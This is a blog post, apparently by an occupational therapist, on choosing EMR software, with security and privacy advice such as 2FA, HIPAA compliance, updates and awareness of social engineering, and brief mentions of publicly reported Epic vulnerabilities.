The Best EMRs for Occupational Therapy Practice – My Vulnerability Concerns

What is the best EMR to use for occupational therapy? What are some concerns that you should have in regards to vulnerabilities?

EMR Interest and Adoption

There is a growing concern for the vulnerabilities in EMR used by occupational therapy practitioners. A frequent question asked on occupational therapy groups for entrepreneurs is, “what EMR software should I use?” Someone on the Internet is probably wondering this and about to make another post asking the same question right now.

“emr” on Google Trends

When it comes to EMR software, I am guessing that security and privacy is not the number 1 feature that occupational therapy practitioners look for. In fact, security and privacy is probably not a feature that people look for in general when it comes to technology. The primary objective of Internet use and software is likely to perform a function (e.g., a calculator app calculates), find an answer (e.g., a google search returns the answer), for entertainment (e.g., Netflix or social media), or for money (e.g., Etsy sellers).

Researchers have wondered why this is the case, such as in the adoption of password managers (PM) by the general public. If you do not use a password manager, I highly recommend that you do. It is a game-changer. I have been using an open-source and free one (Keepass/MacPass) for many years now. Why am I bringing up password managers?

An analogy can be made between password managers and EMRs. They are both software (either stored locally [single device], on a local network [LAN], or on the cloud [web]). They both require authentication to gain access to a database (a “master” password for a PM and a password or easy-sign on for EMRs such as with a work ID badge). They both contain sensitive user information (passwords for PMs and patient charts with medical information for EMRs). And there are numerous options for PMs as there are EMRs. Just as it can be difficult choosing a password manager from the App store or to install on your operating system, it can be even more difficult finding an EMR. EMRs can be inherently complex as they store various patient information including names, demographics, contact information, medical history, treatment notes, and much more.

Gasti and Rasmussen conducted an audit of password managers that were available to them around 2012. They looked at popular software such as Internet browsers, e.g., Google Chrome and Mozilla Firefox as well as other options, 1Password, KeePass, and Roboform. The majority of this software was susceptible to some vulnerabilities including unauthorized database modifications. [1]Gasti, P., & Rasmussen, K. B. (2012, September). On the security of password manager database formats. In European Symposium on Research in Computer Security (pp. 770-787). Springer, Berlin, … Reference List

Research and Practice

Gasti and Rasmussen note that in practice, in addition to the inherent vulnerabilities of the software and their databases (which we have control over by our choice as consumers in what product to you), the second variable is based on the storage mechanism and host of the PM. My analogy applies to EMR as well for how EMRs are stored and where it is hosted. Gasti and Rasmussen classify storage and hosting into 3 classes: from completely insecure (unencrypted databases), to somewhat secure, to the most secure. Most of you will probably fall in the category of somewhat to most secure.

Computing has become more complicated because of the wide adoption of cloud computing. Before the Internet, data was stored locally on the computer. Computers may be connected to a local network (LAN) via ethernet or Wifi and not be exposed to the internet. If the administrator makes some modifications to the firewall such as by forwarding ports for a server, these computers may be exposed to the internet. Now, with the cloud, users may bypass all this and upload or submit their data directly on computers that are stored in the hands of a third-party. If you think about this, it can be kind of a red flag, but we are all doing it with services such as Gmail, Google Docs, Facebook, Dropbox, and the growing list goes on and on.

Essentially, the 3 security classes of storage apply to every single device, no matter local (you can physically access it), remotely over the LAN, Internet, or cloud. Note that I am not anti-cloud, but the proper precautions and research should be conducted before choosing the platform as long as you understand its implications. You may think I am going off on a tangent, but I literally read some posts on an OT Entrepreneur Facebook group about occupational therapy practitioners using Google Docs as their “EMR” solution. Not a good idea as they are not HIPAA compliant. Imagine being audited by the HIPAA folks and telling them you used Google Docs for documentation. Probably doesn’t make for a good case in your favor.

Technically, there is no one solution that is considered more secure than the other, cloud or otherwise. For example, if a user leaves their computer logged-in and steps away for a minute or does not use a log-on password for the EMR stored on that computer, it is less secure than EMR software on the cloud with a strong password and 2-factor authentication (2FA) enabled.

An EMR with 2FA?

Most users are familiar with 2FA by now with examples such as getting a text message to verify your identity after entering a password to log onto a website such as for banking. By the way, using a mobile number for 2FA is considered the least secure of the 2FAs compared to say, Google Authenticator or Authy, but it is better than no 2FA at all. This is because your phone number (the majority of people use a cell phone) can be used as an attack surface via social engineering and a malicious party can gain access to the 1-time code that is sent to your phone number. Interesting isn’t it?

Tip #1: Look for an EMR with 2FA, especially if stored on the cloud. If using a local database EMR, be sure to lock your workstation. Make backups of the database, but make sure the backup solution has 2FA enabled as well.

Human Motivation

“Security is considered a secondary task by end-users.[2]A. Whitten and J. Tygar, “Why Johnny can’t encrypt: a usability evaluation of PGP 5.0,” in Proceedings of the 8th conference on USENIX Security Symposium-Volume 8, 1999. That being so, they try to avoid engaging with security, especially if it gets in the way of their primary goal.[3] A. Beautement, M. A. Sasse, and M. Wonham, “The compliance budget: managing security behaviour in organisations,” in NSPW, 2008, pp. 47–58.

Why are we doing all this in the first place? I love talking about this because it is very “OT” and inherent to the heart and soul of the profession. Why do we do anything? It is likely because personal motivation is influenced by intrinsic and extrinsic factors. Why do people use password managers? They (as was I) are probably tired of memorizing more passwords as the services and programs they use require them to be more complicated (due to the increased sophistication of hackers and improvements in computer hardware to brute force passwords). And for occupational therapy practitioners, paper charts are being phased out in favor of EMRs. The motivation to find a good EMR is to likely make your life easier as an OT practitioner: functionality, saving time, reducing costs from the bottom line, maybe meeting compliance. I doubt it is for security and privacy.

HIPAA Compliance

But OT practitioners need to comply with HIPAA. And EMRs especially need to be “HIPAA compliant”, as do popular solutions such as Zoom video conferencing. I get that new OT entrepreneurs don’t have any or a lot of money to spend on EMR software. But this is when you should really balance cost savings vs. security and privacy. You wouldn’t use an operating system if it was full of security holes even if it was cheap, so the same applies here.

Real-World Vulnerabilities & Exploits

Even more secure products such as the iPhone have been susceptible to security vulnerabilities for many years. Check this article out if you have not heard of this, “How China turned a prize-winning iPhone hack against the Uyghurs“. Supposedly (depending who you ask) China as a statewide actor has been spying on the Uyghurs via an iPhone vulnerability in their controversial genocide against them and use of ‘concentration camps.

The “Best”

I have an Android phone and I got so much judgment for it in OT school, especially for the camera as everyone had an iPhone. I have and use Apple products myself.

It’s ironic because my wife complains that her iPhone X photo quality is “garbage” compared to my 3-year-old Samsung Galaxy that I got around the same time. To this day, my camera quality holds its own against the newest iPhones. Unfortunately, she is locked into the Apple ecosystem (which I understand and am partly responsible for) but really wants a Pixel (the best camera phone in my opinion). My MacBook Air webcam (as I have been saying for many years) is even more “garbage”. People are finding this out now likely due to the pandemic and the widespread use of Zoom and these low-quality MacBook webcams. Why am I bringing this up? Popular and mainstream do not always equate to secure and private or even “best”.

Apple Myths

So when people tell me, Macs can’t get hacked or iPhones are more secure than Android, etc., that is just a myth, as seen with the Ughur iPhone hack controversy. Just as it is with EMR software, it’s not about the device or software, but how you use it, user behavior and best practices, how secure is the coding, who finds vulnerabilities first (hopefully good actors and researchers), how often patches are provided for such vulnerabilities, AND how often users update their software.

If you leave your iPhone without a passcode or if your 2-year-old looks over your shoulder while you are unlocking it and memorizes the passcode to later use it to delete all your Apps, the iPhone might as well be considered “insecure”. The 2-year-old could be a stranger in your OT clinic with bad intentions. Don’t think it couldn’t happen to you because you are a “small fish” in the industry. It’s not that far from reality. A social security number is a social security number at the end of the day in the hands of a hacker.

Tip #2: Security and privacy should be high on the list of priorities when looking for an EMR. A HIPAA breach could cost you or your company thousands of dollars, embarrassment, and bad PR. If Sony, Equifax, and many other popular companies have been hacked, so can you and your EMR software. You may think you are not an attractive target for hackers, but you are. The data you store in your EMR software is highly valuable on the black market, e.g., the deep web, as it contains addresses, social security numbers, and more.

Tip #3: Reflect on how you use computers and technology in general. Do you expose yourself to certain vulnerabilities due to behaviors, practices, or choice of products? Do you update your software when it comes out or do you keep pushing them off?

Social Engineering

Do you expose yourself unintentionally to social engineering? Examples: do you post your favorite Disney characters as decals on your car? Is your child’s name or school on a bumper sticker or on your lawn for their “reading achievements”? Do you have a picture and name of children sitting on your desk (left unattended 24/7?)? Guess what, some of these are probably answers to your “Security Questions” for password recovery, part of your password, or all related one way. It doesn’t necessarily take a single breach to expose your or your patient’s information but could take several steps with a body of information. With some dedication, a stranger could to gain access to your EMR and the information it contains. Reflect and change your behavior.

Tip #4: I highly recommend that you remove those bumper stickers and lawn signs that contain your children’s names or where they go to school.

Social engineering proof of concept of a kidnapper:
“Heyyyy Bobby (your child’s name displayed on your lawn), I am friends with your Mom (your name of your OT business) and work with her at ABC Rehab clinic. I went to OT school with her at (school name on your bumper sticker). I also know your Dad, Jerry (your husband’s landscaping company name) who does work on my house. Your mom asked me to pick you up today and drop you off at her work because she is busy with working and seeing a lot of patients.”
– all information that can be obtained easily from social engineering if you are not careful.

Verdict: The Best EMR Software

Most people will not like this answer, but there is no “best” EMR software. Just as a client is unique and occupational therapists should be client-centered, there is no “one” EMR that works for the masses. Each practitioner may have their own unique use case. For example, using a solution like EPIC may be “overkill” for a small clinic, which does not need to have a database for lab values, doctor’s orders, multiple types of allied health professionals gaining varied levels of access, etc.

I looked into the popular Eic EMR software. Boy, EMR is a big business! On January 16, 2013, NYC Health + Hospitals (H+H) entered into a 15-year, $302 million contract agreement with Epic Systems Corporation (Epic Systems) to replace H+H’s then-20-year-old electronic medical record (EMR) system. [4]https://www.nychealthandhospitals.org/pressrelease/hhc-signs-contract-for-new-electronic-medical-record-system-to-span-citys-entire-public-hospital-system/

How “epic” is Epic Systems and is it the best of the best?

Epic Systems Corporation MyChart “is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction.”

The MyChart software contains [at one point anyways] an X-Path injection due to the lack of sanitization for the GE parameter “topic”. A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp. [5]https://www.exploit-db.com/exploits/44098 They probably patched this by now.

In more recent Epic EMR recent news:

According to a press release shared on the system’s website, a user took advantage of a vulnerability in Epic’s scheduling tool, allowing for 2,700 people to “cut in line” and register for an unauthorized vaccine appointment. Those appointments have now been canceled. [6]https://www.healthcareitnews.com/news/health-system-flags-vulnerability-epic-covid-19-vaccine-scheduler

Thankfully Epic has a security vulnerability or concern reporting page. I wonder if there is something more epic than Epic, maybe it is called Uber. Oh wait…that name’s already taken. Don’t get me wrong, I am not dissing Epic as it is actually a pretty good EMR solution from what I hear. However, just as I highlighted with the iPhone vulnerability, any EMR software is susceptible to attacks, vulnerabilities, and exploits.

Even the “best” EMR is vulnerable to security and privacy issues and COVID-19 line cutters we have come to find out.

NEVER take the first recommendation (or been the most common recommendation, e.g., Facebook comments) from a stranger on the Internet because they could be simply referring to the software or pitching it and have a financial conflict of interest. I see this all the time with paid NBCOT Exam prep solutions. It’s kind of sad. Shoutout to OT Miri, she’s the best.

Consider asking a colleague, but do your own due diligence:

  • Research the software: How long has it been out? Who made it? What is their reputation? Is it just a random program from the Internet that had a great idea? Who or which companies use it? What operating systems is it available on? Just because it is on the Apple mac store does not mean it is safe and secure.
  • Read the terms of use and privacy policy. Yes, I know you never read this, but when it comes to HIPAA, it’s no time to take shortcuts just to get to practice as an OT. What information gets shared and with whom? Does the software ‘ping home’ to a server for no reason?
  • Look for “HIPAA complaint” software.
  • The EMR should have a backup solution if it is stored locally, or you should implement one yourself using the ‘3-2-1 backup’ rule.
  • Download and try a demo or trial and try different software out for a week. Does it crash or have a lot of bugs? Then it’s time to move on.
  • Remember to delete your user data if you discontinue using a subscription-based EMR.
  • See what works and what does not when comparing EMR software and prioritize security and privacy.
  • A good piece of software (whether open-source or closed-source) should have frequent updates. Many software post changelogs publically on the Internet. If your EMR has not been updated since the 1990s, that’s a huge red flag. It might as well be open-access for hackers at that point (in my opinion). *Points at Meditech.
  • It does not stop with just the EMR software, secure the device(s) as well and update them when time allows. Most people hate Windows 10 because of the automatic updates, but this actually helps to workaround poor user practices of updating themselves.
  • What could be the best EMR software one day could literally be 2nd the next because of how fast the technology world is moving.
  • Consider EMR that use databases that are not proprietary and can be exported and transferred to another EMR software. Otherwise, you will be locked into using an old EMR solution due to not wanting to recreate a new patient database. That sounds like a nightmare!
  • Consider getting HIPAA insurance as a rider with professional insurance in case of a breach. It’s not that expensive, even for businesses – I pay about $400/yr for peace of mind.

Best Practices for ALL OTs

  • Secure your workstation and use an unguessable password.
  • If it is possible to sign-on with your badge, never leave your badge unattended, e.g., in your car, or lend it to anyone.
  • Update your operating system and software.
  • Be careful of links from websites and e-mails that attempt to extract personal information such as log-ins, passwords, etc.
  • Do not write your passwords down, use a password manager (preferably one that is not on the cloud, but still preferable compared to using a weak password across different platforms).
  • Pay attention to what you reveal to the public how you interact with devices when around strangers (who may use social engineering to gain access to the EMR or device you are using).

Stay safe and stay protected.

This reminds me, I have to remove my school name’s license plate cover from my car (oops!)

References

References
1 Gasti, P., & Rasmussen, K. B. (2012, September). On the security of password manager database formats. In European Symposium on Research in Computer Security (pp. 770-787). Springer, Berlin, Heidelberg.
2 A. Whitten and J. Tygar, “Why Johnny can’t encrypt: a usability evaluation of PGP 5.0,” in Proceedings of the 8th conference on USENIX Security Symposium-Volume 8, 1999.
3 A. Beautement, M. A. Sasse, and M. Wonham, “The compliance budget: managing security behaviour in organisations,” in NSPW, 2008, pp. 47–58.
4 https://www.nychealthandhospitals.org/pressrelease/hhc-signs-contract-for-new-electronic-medical-record-system-to-span-citys-entire-public-hospital-system/
5 https://www.exploit-db.com/exploits/44098
6 https://www.healthcareitnews.com/news/health-system-flags-vulnerability-epic-covid-19-vaccine-scheduler